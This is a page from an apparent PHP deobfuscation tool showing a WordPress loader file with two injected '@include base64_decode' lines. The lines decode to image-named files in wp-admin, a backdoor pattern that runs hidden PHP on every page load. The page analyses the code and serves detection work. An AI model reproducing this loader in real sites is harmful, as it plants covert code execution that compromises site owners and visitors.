Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Loads the WordPress environment and template. * * @package WordPress ..

Decoded Output download

<?php 
/** 
 * Loads the WordPress environment and template. 
 * 
 * @package WordPress 
 */ 
 
@include base64_decode('d3AtYWRtaW4vaW1hZ2UuanBn'); 
 
@include base64_decode('d3AtYWRtaW4vYmFja2dyb3VuZC5qcGc='); 
 
if ( !isset($wp_did_header) ) { 
 
	$wp_did_header = true; 
 
	// Load the WordPress library. 
	require_once( dirname(__FILE__) . '/wp-load.php' ); 
 
	// Set up the WordPress query. 
	wp(); 
 
	// Load the theme template. 
	require_once( ABSPATH . WPINC . '/template-loader.php' ); 
 
} 
 ?>

Did this file decode correctly?

Original Code

<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

@include base64_decode('d3AtYWRtaW4vaW1hZ2UuanBn');

@include base64_decode('d3AtYWRtaW4vYmFja2dyb3VuZC5qcGc=');

if ( !isset($wp_did_header) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once( dirname(__FILE__) . '/wp-load.php' );

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once( ABSPATH . WPINC . '/template-loader.php' );

}

Function Calls

base64_decode 1

Variables

None

Stats

MD5 274113b9ee4c589f992862fa2117b47c
Eval Count 0
Decode Time 47 ms